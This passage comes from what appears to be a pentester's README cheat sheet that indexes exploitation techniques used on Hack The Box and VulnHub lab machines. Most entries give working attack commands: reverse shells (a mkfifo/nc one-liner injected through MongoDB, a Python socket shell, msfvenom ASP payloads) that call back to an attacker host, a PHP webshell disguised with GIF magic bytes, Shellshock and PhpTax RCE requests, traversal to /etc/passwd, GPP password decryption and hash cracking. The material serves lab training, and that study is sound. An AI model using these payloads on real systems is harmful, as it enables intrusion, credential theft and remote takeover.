[Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_drupal_passwordcrack"></a> #### exploit_drupal_passwordcrack [⇡](#exploit) Crack a drupal password hash ```shell hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt --force ``` [+] https://0xdf.gitlab.io/2019/03/12/htb-bastard.html --- <a name="exploit_ftp_anonymous"></a> #### exploit_ftp_anonymous [⇡](#exploit) Interact with the ftp service using `anonymous/any` credentials | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_ftp_web_root"></a> #### exploit_ftp_web_root [⇡](#exploit) FTP server's root directory is mapped to the web server's root directory. Upload a reverse shell file native to the web server using ftp server (`anonymous` login or default creds or creds reuse or some exploit) and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_gpp_groupsxml"></a> #### exploit_gpp_groupsxml [⇡](#exploit) the Groups.xml file lists username and encrypted password that can be useful to gain initial access on the target system. access this file via an open ftp/smb share or some other method ```shell smbclient //10.10.10.100/Replication get ..\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml Groups.xml exit cat Groups.xml gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" smbclient //10.10.10.100/Users -U SVC_TGS ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://adsecurity.org/?p=2288 --- <a name="exploit_gymsystem_rce"></a> #### exploit_gymsystem_rce [⇡](#exploit) use `/contacts.php` to confirm the version is 1.0 and fire this exploit to get a pseudo-interactive shell on the target machine. you can ```shell python 48506.py http://<targetip>:<targetport>/ curl "http://<targetip>:<targetport>/upload/kamehameha.php?telepathy=whoami" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48506 --- <a name="exploit_hfs_cmd_exec"></a> #### exploit_hfs_cmd_exec [⇡](#exploit) HFS (`HttpFileServer 2.3.x`) is vulnerable to remote command execution ```shell python 39161.py <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | [+] https://www.exploit-db.com/exploits/39161 [+] https://nvd.nist.gov/vuln/detail/CVE-2014-6287 --- <a name="exploit_iis_asp_reverseshell"></a> #### exploit_iis_asp_reverseshell [⇡](#exploit) use an `asp`|`aspx` reverse shell to gain interactive access on the target system. useful when Microsoft IIS server is found during enumeration. might need a separate vulnerability to upload the reverse shell file on target system (use burp to bypass filename filter - revshell.aspx%00.jpg) ```shell msfvenom -p windows/shell/reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f asp >rs.asp msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f aspx >rs.aspx ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#kali-aspx-shells --- <a name="exploit_iis_webdav"></a> #### exploit_iis_webdav [⇡](#exploit) multiple iis webdav issues. can use msf exploits `windows/iis/iis_webdav_scstoragepathfromurl` or `windows/iis/iis_webdav_upload_asp` to gain interactive access on the target system ```shell msfconsole use windows/iis/iis_webdav_scstoragepathfromurl set rhost <targetip> set rport <targetport> show options exploit use windows/iis/iis_webdav_upload_asp set rhost <targetip> set rport <targetport> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 2. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp --- <a name="exploit_lotuscms"></a> #### exploit_lotuscms [⇡](#exploit) LotusCMS is vulnerable to remote code execution ```shell nc -nlvp <attackerport> ./lotusRCE.sh <targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | [+] https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh --- <a name="exploit_modssl"></a> #### exploit_modssl [⇡](#exploit) Apache `mod_ssl < 2.8.7` is vulnerable to remote code execution ```shell gcc -o 47080 47080.c -lcrypto ./47080 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2 ./47080 0x6b <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | [+] https://www.exploit-db.com/exploits/47080 [+] https://nvd.nist.gov/vuln/detail/CVE-2002-0082 --- <a name="exploit_mongodb"></a> #### exploit_mongodb [⇡](#exploit) ```shell nc -nlvp <attackerport> mongo -p -u <user> <record> db.tasks.insert({"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> <attackerport> >/tmp/f"}) bye ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nfs_rw"></a> #### exploit_nfs_rw [⇡](#exploit) when an open nfs share is found, look for available mountpoints, mount using `nfsv3` so that we can see the real remote `uid` and `gid`, create a new user with expected `uid`, switch user, create the `.ssh` directory, copy `id_rsa.pub` to this directory and ssh to gain interactive access on the target system ```shell check available mountpoints mount file system via nfs v3 check uid of user create a new local user with nfs user's uid change to new user copy ssh public key to .ssh/authorized_keys file ssh into the target as user copy root owned copy of bash from local system to nfs mount running "./bash -p" gives root access as euid is carried over during copy operation mount nfsv3, create new user with nfs user uid and get root shell unmount and remove temporary user: showmount -e <targetip> mkdir /tmp/nfs mount <targetip>:/home/vulnix /tmp/nfs -o vers=3 # nfs v3 allows listing of user ids for shared files ls -l /tmp/nfs # check the uid and use it to create new user useradd -u 2008 vulnix su vulnix copy ~/.ssh/id_rsa.pub to ~/.ssh/authorized_keys on target host to gain passwordless ssh access umount /tmp/nfs ; userdel vulnix showmount -e <targetip> Export list for <targetip>: /home/vulnix * mkdir ./mnt/ mount <targetip>:/home/vulnix ./mnt -o vers=3 ls -l groupadd --gid 2008 vulnix ; useradd --uid 2008 --groups vulnix vulnix cp ~/.ssh/id_rsa.pub ./authorized_keys su vulnix cd ./mnt/ mkdir .ssh/ cp ./authorized_keys ./.ssh/ exit ssh vulnix@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | [+] https://blog.christophetd.fr/write-up-vulnix/ --- <a name="exploit_nodejs"></a> #### exploit_nodejs [⇡](#exploit) inspect source for `assets/js/app/controllers/*.js` files and look for rest api calls that could leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nodejs_deserialize"></a> #### exploit_nodejs_deserialize [⇡](#exploit) user input is passed to `unserialize()` method that could allow remote code execution [+] https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup/ [+] https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py [+] https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py [+] https://0xdf.gitlab.io/2018/08/25/htb-celestial.html --- <a name="exploit_pchart"></a> #### exploit_pchart [⇡](#exploit) the `pChart 2.1.3` web application is vulnerable to directory traversal ```shell http://<targetip>/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/31173 [+] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb --- <a name="exploit_pfsense"></a> #### exploit_pfsense [⇡](#exploit) pfsense 2.1.3 is vulnerable to command injection ```shell python3 43560.py --rhost <targetip> --lhost <attackerip> --lport <attackerport> --username foo --password bar ``` [+] https://www.exploit-db.com/exploits/43560 [+] https://medium.com/@ranakhalil101/hack-the-box-sense-writeup-w-o-metasploit-ef064f380190 --- <a name="exploit_php_acs_rfi"></a> #### exploit_php_acs_rfi [⇡](#exploit) Advanced Comment System 1.0 is vulnerable to remote file inclusion and command execution attacks ```shell curl -v "<targetip>/internal/advanced_comment_system/admin.php?ACS_path=php://input%00" -d "<?system('whoami');?>" ``` [+] https://www.exploit-db.com/exploits/9623 --- <a name="exploit_php_fileupload"></a> #### exploit_php_fileupload [⇡](#exploit) certain poorly developed php web applications allow unrestricted file uploads that can be abused to gain interactive access on the target system ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php subl rs.php # point to <attackerip> and <attackerport> nc -nlvp <attackerport> # upload rs.php and trigger execution ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_fileupload_bypass"></a> #### exploit_php_fileupload_bypass [⇡](#exploit) add gif file magicbytes `GIF891` to a php reverse shell file, rename it to rs.php.gif and upload to bypass upload filter. sometimes, a restrictve waf might still stop file upload. in that case, use a minimal command execution php file with gif magicbytes instead of a full php reverse shell ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php.gif subl rs.php.gif # point to <attackerip> and <attackerport> AND add GIF89a to the start of file nc -nlvp <attackerport> # upload rs.php.gif and trigger execution ### echo -e 'GIF89a\n<?php $out=$_GET["cmd"]; echo `$out`; ?>' >cmd.gif # upload and execute commands ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 2. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_reverseshell"></a> #### exploit_php_reverseshell [⇡](#exploit) use php reverse shell code with an exploit to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 5. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_php_webshell"></a> #### exploit_php_webshell [⇡](#exploit) use the php web shell to execute arbitrary commands and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="exploit_phptax"></a> #### exploit_phptax [⇡](#exploit) the `Phptax 0.8` web application is vulnerable to remote code execution ```shell GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1 Host: <targetip>:<targetport> User-Agent: Mozilla/4.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0 GET /phptax/data/rce.php?cmd=uname%20-a HTTP/1.1 Host: <targetip>:<targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/25849 --- <a name="exploit_prtg_sensors"></a> #### exploit_prtg_sensors [⇡](#exploit) execute a reverse shell command through prtg sensor creation dialog and play it to get interactive access on the target system ```shell ./46527.sh -u http://<targetip> -c "<prtg session cookie>" psexec.py [email protected] ``` [+] https://www.exploit-db.com/exploits/46527 [+] https://nvd.nist.gov/vuln/detail/CVE-2018-9276 [+] https://hipotermia.pw/htb/netmon [+] https://snowscan.io/htb-writeup-netmon/# --- <a name="exploit_psexec_login"></a> #### exploit_psexec_login [⇡](#exploit) If credentials for a non-administrative user are available, we can use `psexec.py` to connect and gain interactive access to the target system. ```shell psexec <username>@<targetip> ``` --- <a name="exploit_python_reverseshell"></a> #### exploit_python_reverseshell [⇡](#exploit) use a python reverse shell to gain interactive access on the target system ```shell nc -nlvp 9999 http://<targetip>/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerip>",<attackerport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#python-reverse-shell --- <a name="exploit_shellshock"></a> #### exploit_shellshock [⇡](#exploit) ```shell curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` | # | Name | Infra | Killchain | TTPs 